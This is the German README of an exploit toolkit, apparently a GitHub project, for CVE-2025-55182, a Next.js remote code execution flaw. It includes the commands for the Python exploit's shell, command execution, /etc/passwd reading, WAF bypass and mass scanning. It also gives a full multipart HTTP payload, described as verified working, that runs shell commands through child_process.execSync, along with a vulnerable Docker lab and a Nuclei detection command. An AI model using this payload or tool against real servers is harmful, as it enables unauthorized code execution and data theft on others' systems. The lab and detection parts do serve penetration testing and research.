
React2Shell-Exploit — Vollständiges Exploit-Framework für CVE-2025-55182, einschließlich Python-Exploit, verwundbarem Docker-Labor, manueller und automatisierter Exploitation mit Burp Suite, Nuclei-Erkennungstemplate und validiertem Testworkflow. Entwickelt für Penetrationstests und zu Bildungs- und Forschungszwecken.
CVE-2025-55182 – Next.js RCE Remote Code Execution
Exploit-Framework + verwundbares Labor + Burp Suite & Nuclei-Validierung.
Vollständiges Exploitation-Framework und verwundbare Laborumgebung für Sicherheitsforschung und Penetrationstests.
╔═══════════════════════════════════════════════════════════════╗
║ 🐺 React2Shell-Exploit-Kensei 🐺 ║
║ CVE-2025-55182 Exploitation Tool ║
║ ║
║ Author: Ruben Suxo - Ethical Hacker (kensei) v2.5.0 ║
╚═══════════════════════════════════════════════════════════════╝
React2Shell-Exploit-Kensei ist ein umfassendes Toolkit zur Ausnutzung von CVE-2025-55182, einer kritischen Remote-Code-Execution-Schwachstelle in Next.js-Anwendungen.
Es enthält:
Betroffene Versionen:
CVSS-Score: 10.0 (Kritisch)
✅ Automatisierte Exploitation
✅ Interaktive Shell
✅ Befehlsausführung
✅ Dateilesen
✅ WAF-Bypass
✅ Batch-Scanning
Docker muss installiert sein, um das verwundbare Labor auszuführen.
| Plattform | Installationslink |
|---|---|
| Windows | https://docs.docker.com/desktop/install/windows/ |
| macOS | https://docs.docker.com/desktop/install/mac-install/ |
| Linux |
Installation überprüfen:
docker --version
✅ Burp-Suite-Anleitung
✅ Nuclei-Vorlage
✅ Vollständige Beispiele
# 1. Clone
git clone react2shell-exploit
cd react2shell-exploit
chmod +x react2shell-exploit.py
# 2. Start Lab
cd docker
docker build --no-cache -t react2shell-lab .
docker run -d -p 3002:3002 --name react2shell-lab react2shell-lab
# 3. Exploit
python3 react2shell-exploit.py --url http://localhost:3002 --cmd "whoami"
python3 react2shell-exploit.py --url http://target.com --scan
python3 react2shell-exploit.py --url http://target.com --cmd "id"
python3 react2shell-exploit.py --url http://target.com --shell
python3 react2shell-exploit.py --url http://target.com --read /etc/passwd
python3 react2shell-exploit.py --url http://target.com --cmd "whoami" --waf-bypass
python3 react2shell-exploit.py --list targets.txt --scan --threads 20
Verifiziert funktionsfähig – Request-Vorlage:
POST / HTTP/1.1
Host: target.com:3002
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Next-Action: x
Content-Length: 734
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('whoami',{timeout:30000}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/exploit?out=${encodeURIComponent(res)};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
Erwartete Antwort:
"children":["__PAGE__?{\"out\":\"root\"}",{}]
Manuelles Testen von WHOAMI:

Manuelles Testen von IFCONFIG:

Alternative automatisierte Erkennungsmethoden:








Verifiziert funktionsfähig:
nuclei -target http://target.com:3002 -t nuclei/CVE-2025-55182.yaml
Ausgabe:
[CVE-2025-55182] [http] [critical] http://target.com:3002/

Autor: Ruben Suxo – Ethical Hacker (kensei)
Version: 2.5.0
Datum: 2025-12-06
Dieses Projekt basiert auf Forschung und Techniken von:
Nur für autorisierte Sicherheitstests.
Unbefugter Zugriff ist illegal. Verwende es nur auf Systemen, die dir gehören oder für die du eine ausdrückliche Genehmigung zum Testen hast.
MIT-Lizenz
🐺 Hack The Planet – Verantwortungsvoll
Nur für Bildungszwecke. Ethisch verwenden.
| https://docs.docker.com/engine/install/ |